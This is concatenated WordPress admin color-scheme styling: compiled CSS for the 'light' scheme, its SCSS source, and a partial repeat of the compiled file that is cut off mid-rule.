#customize-theme-controls .control-section:hover>.accordion-section-title:after{color:#0073aa}.wp-core-ui .customize-control .attachment-media-view .button-add-media:focus{background-color:#fbfbfc;border-color:#e1a948;border-style:solid;box-shadow:0 0 0 1px #e1a948;outline:2px solid transparent}.wp-core-ui .wp-full-overlay-footer .devices button.active:hover,.wp-core-ui .wp-full-overlay-footer .devices button:focus{border-bottom-color:#e1a948}.wp-core-ui .wp-full-overlay-footer .devices button:focus:before,.wp-core-ui .wp-full-overlay-footer .devices button:hover:before{color:#e1a948}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover{color:#e1a948}.wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow,.wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow{box-shadow:0 0 0 1px rgb(232.1830985915,189.5915492958,115.8169014085),0 0 2px 1px #e1a948}.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus,.wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover{border-bottom-color:#e1a948;color:#0073aa}/*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f5f5f5; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } /* Core UI */ .wp-core-ui { /* Default button - theme color border and text (matches secondary) */ } .wp-core-ui .button { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button:disabled, .wp-core-ui .button.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Secondary button - same as default */ } .wp-core-ui .button-secondary { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wp-core-ui .button-secondary:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-secondary:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-secondary:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .wp-core-ui .button-secondary:disabled, .wp-core-ui .button-secondary.disabled { background: transparent; border-color: #dddddd; color: #949494; cursor: not-allowed; } .wp-core-ui { /* Primary button - theme color background */ } .wp-core-ui .button-primary { background: var(--wp-admin-theme-color); border-color: transparent; border-radius: 2px; color: #fff; } .wp-core-ui .button-primary:hover { background: var(--wp-admin-theme-color-darker-10); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:focus { background: var(--wp-admin-theme-color); border-color: transparent; color: #fff; /* Gutenberg-style focus ring: outer theme color + inset white for contrast */ box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color), inset 0 0 0 1px #ffffff; /* Visible in Windows High Contrast mode */ outline: 1px solid transparent; } .wp-core-ui .button-primary:active { background: var(--wp-admin-theme-color-darker-20); border-color: transparent; color: #fff; } .wp-core-ui .button-primary:disabled, .wp-core-ui .button-primary.disabled { background: #f0f0f0; border-color: transparent; color: #949494; cursor: not-allowed; } .wp-core-ui .button-primary.active, .wp-core-ui .button-primary.active:focus, .wp-core-ui .button-primary.active:hover { background: var(--wp-admin-theme-color-darker-10); color: #fff; border-color: transparent; box-shadow: none; } .wp-core-ui .button-group > .button.active { border-color: var(--wp-admin-theme-color); background: rgba(var(--wp-admin-theme-color--rgb), 0.08); } .wp-core-ui .wp-ui-primary { color: #333; background-color: #e5e5e5; } .wp-core-ui .wp-ui-text-primary { color: #e5e5e5; } .wp-core-ui .wp-ui-highlight { color: #fff; background-color: #888; } .wp-core-ui .wp-ui-text-highlight { color: #888; } .wp-core-ui .wp-ui-notification { color: #fff; background-color: #d64e07; } .wp-core-ui .wp-ui-text-notification { color: #d64e07; } .wp-core-ui .wp-ui-text-icon { color: #999; } /* List tables */ .wrap .page-title-action { background: transparent; border: 1px solid var(--wp-admin-theme-color); border-radius: 2px; color: var(--wp-admin-theme-color); } .wrap .page-title-action:hover { background: rgba(var(--wp-admin-theme-color--rgb), 0.04); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); } .wrap .page-title-action:focus { background: transparent; border-color: var(--wp-admin-theme-color); color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wrap .page-title-action:active { background: rgba(var(--wp-admin-theme-color--rgb), 0.08); border-color: var(--wp-admin-theme-color-darker-20); color: var(--wp-admin-theme-color-darker-20); box-shadow: none; } .view-switch a.current:before { color: #e5e5e5; } .view-switch a:hover:before { color: #d64e07; } /* Admin Menu */ #adminmenuback, #adminmenuwrap, #adminmenu { background: #e5e5e5; } #adminmenu a { color: #333; } #adminmenu div.wp-menu-image:before { color: #999; } #adminmenu a:hover, #adminmenu li.menu-top:hover, #adminmenu li.opensub > a.menu-top, #adminmenu li > a.menu-top:focus { color: #fff; background-color: #888; } #adminmenu li.menu-top:hover div.wp-menu-image:before, #adminmenu li.opensub > a.menu-top div.wp-menu-image:before { color: #ccc; } /* Active tabs use a bottom border color that matches the page background color. */ .about-wrap .nav-tab-active, .nav-tab-active, .nav-tab-active:hover { background-color: #f5f5f5; border-bottom-color: #f5f5f5; } /* Admin Menu: submenu */ #adminmenu .wp-submenu, #adminmenu .wp-has-current-submenu .wp-submenu, #adminmenu .wp-has-current-submenu.opensub .wp-submenu, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu { background: #fff; } #adminmenu li.wp-has-submenu.wp-not-current-submenu.opensub:hover:after, #adminmenu li.wp-has-submenu.wp-not-current-submenu:focus-within:after { border-left-color: #fff; } #adminmenu .wp-submenu .wp-submenu-head { color: rgb(104.4, 104.4, 104.4); } #adminmenu .wp-submenu a, #adminmenu .wp-has-current-submenu .wp-submenu a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a { color: rgb(104.4, 104.4, 104.4); } #adminmenu .wp-submenu a:focus, #adminmenu .wp-submenu a:hover, #adminmenu .wp-has-current-submenu .wp-submenu a:focus, #adminmenu .wp-has-current-submenu .wp-submenu a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu a:hover { color: #04a4cc; } /* Admin Menu: current */ #adminmenu .wp-submenu li.current a, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a { color: #333; } #adminmenu .wp-submenu li.current a:hover, #adminmenu .wp-submenu li.current a:focus, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:hover, #adminmenu a.wp-has-current-submenu:focus + .wp-submenu li.current a:focus, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:hover, #adminmenu .wp-has-current-submenu.opensub .wp-submenu li.current a:focus { color: #04a4cc; } ul#adminmenu a.wp-has-current-submenu:after, ul#adminmenu > li.current > a.current:after { border-left-color: #f5f5f5; } #adminmenu li.current a.menu-top, #adminmenu li.wp-has-current-submenu a.wp-has-current-submenu, #adminmenu li.wp-has-current-submenu .wp-submenu .wp-submenu-head, .folded #adminmenu li.current.menu-top { color: #fff; background: #888; } #adminmenu li.wp-has-current-submenu div.wp-menu-image:before, #adminmenu a.current:hover div.wp-menu-image:before, #adminmenu li.current div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu a:focus div.wp-menu-image:before, #adminmenu li.wp-has-current-submenu.opensub div.wp-menu-image:before, #adminmenu li:hover div.wp-menu-image:before, #adminmenu li a:focus div.wp-menu-image:before, #adminmenu li.opensub div.wp-menu-image:before { color: #ccc; } /* Admin Menu: bubble */ #adminmenu .menu-counter, #adminmenu .awaiting-mod, #adminmenu .update-plugins { color: #fff; background: #d64e07; } #adminmenu li.current a .awaiting-mod, #adminmenu li a.wp-has-current-submenu .update-plugins, #adminmenu li:hover a .awaiting-mod, #adminmenu li.menu-top:hover > a .update-plugins { color: #333; background: #fff; } /* Admin Menu: collapse button */ #collapse-button { color: #777; } #collapse-button:hover, #collapse-button:focus { color: #04a4cc; } /* Admin Bar */ #wpadminbar { color: #333; background: #e5e5e5; } #wpadminbar .ab-item, #wpadminbar a.ab-item, #wpadminbar > #wp-toolbar span.ab-label, #wpadminbar > #wp-toolbar span.noticon { color: #333; } #wpadminbar .ab-icon, #wpadminbar .ab-icon:before, #wpadminbar .ab-item:before, #wpadminbar .ab-item:after { color: #999; } #wpadminbar:not(.mobile) .ab-top-menu > li:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojq .quicklinks .ab-top-menu > li > .ab-item:focus, #wpadminbar.nojs .ab-top-menu > li.menupop:hover > .ab-item, #wpadminbar .ab-top-menu > li.menupop.hover > .ab-item { color: #04a4cc; background: #fff; } #wpadminbar:not(.mobile) > #wp-toolbar li:hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar li.hover span.ab-label, #wpadminbar:not(.mobile) > #wp-toolbar a:focus span.ab-label { color: #04a4cc; } #wpadminbar:not(.mobile) li:hover .ab-icon:before, #wpadminbar:not(.mobile) li:hover .ab-item:before, #wpadminbar:not(.mobile) li:hover .ab-item:after, #wpadminbar:not(.mobile) li:hover #adminbarsearch:before { color: #04a4cc; } /* Admin Bar: submenu */ #wpadminbar .menupop .ab-sub-wrapper { background: #fff; } #wpadminbar .quicklinks .menupop ul.ab-sub-secondary, #wpadminbar .quicklinks .menupop ul.ab-sub-secondary .ab-submenu { background: rgb(246.85, 246.85, 246.85); } #wpadminbar .ab-submenu .ab-item, #wpadminbar .quicklinks .menupop ul li a, #wpadminbar .quicklinks .menupop.hover ul li a, #wpadminbar.nojs .quicklinks .menupop:hover ul li a { color: rgb(104.4, 104.4, 104.4); } #wpadminbar .quicklinks li .blavatar, #wpadminbar .menupop .menupop > .ab-item:before { color: #999; } #wpadminbar .quicklinks .menupop ul li a:hover, #wpadminbar .quicklinks .menupop ul li a:focus, #wpadminbar .quicklinks .menupop ul li a:hover strong, #wpadminbar .quicklinks .menupop ul li a:focus strong, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a, #wpadminbar .quicklinks .menupop.hover ul li a:hover, #wpadminbar .quicklinks .menupop.hover ul li a:focus, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:hover, #wpadminbar.nojs .quicklinks .menupop:hover ul li a:focus, #wpadminbar li:hover .ab-icon:before, #wpadminbar li:hover .ab-item:before, #wpadminbar li a:focus .ab-icon:before, #wpadminbar li .ab-item:focus:before, #wpadminbar li .ab-item:focus .ab-icon:before, #wpadminbar li.hover .ab-icon:before, #wpadminbar li.hover .ab-item:before, #wpadminbar li:hover #adminbarsearch:before, #wpadminbar li #adminbarsearch.adminbar-focused:before { color: #04a4cc; } #wpadminbar .quicklinks li a:hover .blavatar, #wpadminbar .quicklinks li a:focus .blavatar, #wpadminbar .quicklinks .ab-sub-wrapper .menupop.hover > a .blavatar, #wpadminbar .menupop .menupop > .ab-item:hover:before, #wpadminbar.mobile .quicklinks .hover .ab-icon:before, #wpadminbar.mobile .quicklinks .hover .ab-item:before { color: #04a4cc; } #wpadminbar.mobile .quicklinks .ab-icon:before, #wpadminbar.mobile .quicklinks .ab-item:before { color: #999; } /* Admin Bar: search */ #wpadminbar #adminbarsearch:before { color: #999; } #wpadminbar > #wp-toolbar > #wp-admin-bar-top-secondary > #wp-admin-bar-search #adminbarsearch input.adminbar-input:focus { color: #333; background: rgb(246.85, 246.85, 246.85); } /* Admin Bar: recovery mode */ #wpadminbar #wp-admin-bar-recovery-mode { color: #fff; background-color: #d64e07; } #wpadminbar #wp-admin-bar-recovery-mode .ab-item, #wpadminbar #wp-admin-bar-recovery-mode a.ab-item { color: #fff; } #wpadminbar .ab-top-menu > #wp-admin-bar-recovery-mode.hover > .ab-item, #wpadminbar.nojq .quicklinks .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode:hover > .ab-item, #wpadminbar:not(.mobile) .ab-top-menu > #wp-admin-bar-recovery-mode > .ab-item:focus { color: #fff; background-color: rgb(192.6, 70.2, 6.3); } /* Admin Bar: my account */ #wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar > a img { border-color: rgb(246.85, 246.85, 246.85); background-color: rgb(246.85, 246.85, 246.85); } #wpadminbar #wp-admin-bar-user-info .display-name { color: #333; } #wpadminbar #wp-admin-bar-user-info a:hover .display-name { color: #04a4cc; } #wpadminbar #wp-admin-bar-user-info .username { color: rgb(104.4, 104.4, 104.4); } /* Pointers */ .wp-pointer .wp-pointer-content h3 { background-color: #04a4cc; border-color: rgb(3.5096153846, 143.8942307692, 178.9903846154); } .wp-pointer .wp-pointer-content h3:before { color: #04a4cc; } .wp-pointer.wp-pointer-top .wp-pointer-arrow, .wp-pointer.wp-pointer-top .wp-pointer-arrow-inner, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow, .wp-pointer.wp-pointer-undefined .wp-pointer-arrow-inner { border-bottom-color: #04a4cc; } /* Media */ .media-item .bar, .media-progress-bar div { background-color: #04a4cc; } .details.attachment { box-shadow: inset 0 0 0 3px #fff, inset 0 0 0 7px #04a4cc; } .attachment.details .check { background-color: #04a4cc; box-shadow: 0 0 0 1px #fff, 0 0 0 2px #04a4cc; } .media-selection .attachment.selection.details .thumbnail { box-shadow: 0 0 0 1px #fff, 0 0 0 3px #04a4cc; } /* Themes */ .theme-browser .theme.active .theme-name, .theme-browser .theme.add-new-theme a:hover:after, .theme-browser .theme.add-new-theme a:focus:after { background: #04a4cc; } .theme-browser .theme.add-new-theme a:hover span:after, .theme-browser .theme.add-new-theme a:focus span:after { color: #04a4cc; } .theme-section.current, .theme-filter.current { border-bottom-color: #e5e5e5; } body.more-filters-opened .more-filters { color: #333; background-color: #e5e5e5; } body.more-filters-opened .more-filters:before { color: #333; } body.more-filters-opened .more-filters:hover, body.more-filters-opened .more-filters:focus { background-color: #888; color: #fff; } body.more-filters-opened .more-filters:hover:before, body.more-filters-opened .more-filters:focus:before { color: #fff; } /* Widgets */ .widgets-chooser li.widgets-chooser-selected { background-color: #888; color: #fff; } .widgets-chooser li.widgets-chooser-selected:before, .widgets-chooser li.widgets-chooser-selected:focus:before { color: #fff; } /* Nav Menus */ .nav-menus-php .item-edit:focus:before { box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231), 0 0 2px 1px #04a4cc; } /* Responsive Component */ div#wp-responsive-toggle a:before { color: #999; } .wp-responsive-open div#wp-responsive-toggle a { border-color: transparent; background: #888; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle a { background: #fff; } .wp-responsive-open #wpadminbar #wp-admin-bar-menu-toggle .ab-icon:before { color: #999; } /* TinyMCE */ .mce-container.mce-menu .mce-menu-item:hover, .mce-container.mce-menu .mce-menu-item.mce-selected, .mce-container.mce-menu .mce-menu-item:focus, .mce-container.mce-menu .mce-menu-item-normal.mce-active, .mce-container.mce-menu .mce-menu-item-preview.mce-active { background: #04a4cc; } /* Customizer */ .wp-core-ui #customize-controls .control-section:hover > .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:hover, .wp-core-ui #customize-controls .control-section.open .accordion-section-title, .wp-core-ui #customize-controls .control-section .accordion-section-title:focus { color: #0073aa; border-right-color: #04a4cc; } .wp-core-ui .customize-controls-close:focus, .wp-core-ui .customize-controls-close:hover, .wp-core-ui .customize-controls-preview-toggle:focus, .wp-core-ui .customize-controls-preview-toggle:hover { color: #0073aa; border-top-color: #04a4cc; } .wp-core-ui .customize-panel-back:hover, .wp-core-ui .customize-panel-back:focus, .wp-core-ui .customize-section-back:hover, .wp-core-ui .customize-section-back:focus { color: #0073aa; border-right-color: #04a4cc; } .wp-core-ui .customize-screen-options-toggle:hover, .wp-core-ui .customize-screen-options-toggle:active, .wp-core-ui .customize-screen-options-toggle:focus, .wp-core-ui .active-menu-screen-options .customize-screen-options-toggle, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:hover, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:active, .wp-core-ui #customize-controls .customize-info.open.active-menu-screen-options .customize-help-toggle:focus { color: #0073aa; } .wp-core-ui .customize-screen-options-toggle:focus:before, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus:before, .wp-core-ui.wp-customizer button:focus .toggle-indicator:before, .wp-core-ui .menu-item-bar .item-delete:focus:before, .wp-core-ui #available-menu-items .item-add:focus:before, .wp-core-ui #customize-save-button-wrapper .save:focus, .wp-core-ui #publish-settings:focus { box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231), 0 0 2px 1px #04a4cc; } .wp-core-ui #customize-controls .customize-info.open .customize-help-toggle, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:focus, .wp-core-ui #customize-controls .customize-info .customize-help-toggle:hover { color: #0073aa; } .wp-core-ui .control-panel-themes .customize-themes-section-title:focus, .wp-core-ui .control-panel-themes .customize-themes-section-title:hover { border-right-color: #04a4cc; color: #0073aa; } .wp-core-ui .control-panel-themes .theme-section .customize-themes-section-title.selected:after { background: #04a4cc; } .wp-core-ui .control-panel-themes .customize-themes-section-title.selected { color: #0073aa; } .wp-core-ui #customize-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-theme-controls .control-section .accordion-section-title:focus:after, .wp-core-ui #customize-outer-theme-controls .control-section:hover > .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:hover:after, .wp-core-ui #customize-outer-theme-controls .control-section.open .accordion-section-title:after, .wp-core-ui #customize-outer-theme-controls .control-section .accordion-section-title:focus:after { color: #0073aa; } .wp-core-ui .customize-control .attachment-media-view .button-add-media:focus { background-color: #fbfbfc; border-color: #04a4cc; border-style: solid; box-shadow: 0 0 0 1px #04a4cc; outline: 2px solid transparent; } .wp-core-ui .wp-full-overlay-footer .devices button:focus, .wp-core-ui .wp-full-overlay-footer .devices button.active:hover { border-bottom-color: #04a4cc; } .wp-core-ui .wp-full-overlay-footer .devices button:hover:before, .wp-core-ui .wp-full-overlay-footer .devices button:focus:before { color: #04a4cc; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus { color: #04a4cc; } .wp-core-ui .wp-full-overlay .collapse-sidebar:hover .collapse-sidebar-arrow, .wp-core-ui .wp-full-overlay .collapse-sidebar:focus .collapse-sidebar-arrow { box-shadow: 0 0 0 1px rgb(8.8269230769, 201.9038461538, 250.1730769231), 0 0 2px 1px #04a4cc; } .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .close:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .right:hover, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:focus, .wp-core-ui.wp-customizer .theme-overlay .theme-header .left:hover { border-bottom-color: #04a4cc; color: #0073aa; } /* Override the theme filter highlight color for this scheme */ .theme-section.current, .theme-filter.current { border-bottom-color: #04a4cc; }@use "sass:color"; $highlight-color: #04a4cc; $text-color: #333; $menu-avatar-frame: #aaa; @use "../_admin.scss" with ( $scheme-name: "light", $base-color: #e5e5e5, $icon-color: #999, $text-color: $text-color, $highlight-color: $highlight-color, $notification-color: #d64e07, $body-background: #f5f5f5, $menu-highlight-text: #fff, $menu-highlight-icon: #ccc, $menu-highlight-background: #888, $menu-bubble-text: #fff, $menu-submenu-background: #fff, $menu-collapse-text: #777, $menu-collapse-focus-icon: #555, $dashboard-accent-1: $highlight-color, $dashboard-accent-2: color.adjust(color.adjust($highlight-color, $lightness: 7%), $saturation: -15%), $dashboard-icon-background: $text-color ); /* Override the theme filter highlight color for this scheme */ .theme-section.current, .theme-filter.current { border-bottom-color: admin.$highlight-color; } /*! This file is auto-generated */ /* * Button mixin - creates a primary button effect. * Uses CSS custom properties for theme color support across color schemes. */ /* * Secondary button mixin - outlined style with theme color. * Matches Gutenberg's .is-secondary button variant. */ /* * Tertiary button mixin - transparent background, gray text. */ /** * This function name uses British English to maintain backward compatibility, as developers * may use the function in their own admin CSS files. See #56811. */ body { background: #f5f5f5; } /* Links */ a { color: #0073aa; } a:hover, a:active, a:focus { color: rgb(0, 149.5, 221); } #post-body .misc-pub-post-status:before, #post-body #visibility:before, .curtime #timestamp:before, #post-body .misc-pub-revisions:before, span.wp-media-buttons-icon:before { color: currentColor; } /* Link button - appears as text link, no border or background */ /* Matches Gutenberg's .is-link button variant */ .wp-core-ui .button-link, .wp-core-ui .button.button-link { color: var(--wp-admin-theme-color); } .wp-core-ui .button-link:hover, .wp-core-ui .button-link:active, .wp-core-ui .button.button-link:hover, .wp-core-ui .button.button-link:active { color: var(--wp-admin-theme-color-darker-20); } .wp-core-ui .button-link:focus, .wp-core-ui .button.button-link:focus { color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); outline: 1px solid transparent; } .wp-core-ui .button-link:disabled, .wp-core-ui .button-link[aria-disabled=true], .wp-core-ui .button.button-link:disabled, .wp-core-ui .button.button-link[aria-disabled=true] { color: #949494; } .media-modal .delete-attachment, .media-modal .trash-attachment, .media-modal .untrash-attachment, .wp-core-ui .button-link-delete { color: #cc1818; } .media-modal .delete-attachment:hover, .media-modal .trash-attachment:hover, .media-modal .untrash-attachment:hover, .media-modal .delete-attachment:focus, .media-modal .trash-attachment:focus, .media-modal .untrash-attachment:focus, .wp-core-ui .button-link-delete:hover, .wp-core-ui .button-link-delete:focus { color: rgb(230.6842105263, 48.3157894737, 48.3157894737); } /* Forms */ input[type=checkbox]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type=radio]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } .wp-core-ui input[type=reset]:hover, .wp-core-ui input[type=reset]:active { color: rgb(0, 149.5, 221); } input[type=text]:focus, input[type=password]:focus, input[type=color]:focus, input[type=date]:focus, input[type=datetime]:focus, input[type=datetime-local]:focus, input[type=email]:focus, input[type=month]:focus, input[type=number]:focus, input[type=search]:focus, input[type=tel]:focus, input[type=time]:focus, input[type=url]:focus, input[type=week]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } input[type=checkbox]:focus, input[type=radio]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #ffffff, 0 0 0 4px var(--wp-admin-theme-color); outline: 2px solid transparent; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected=true] { background-color: var(--wp-admin-theme-color); } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .mailserver-pass-wrap .button.wp-hide-pw:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-colo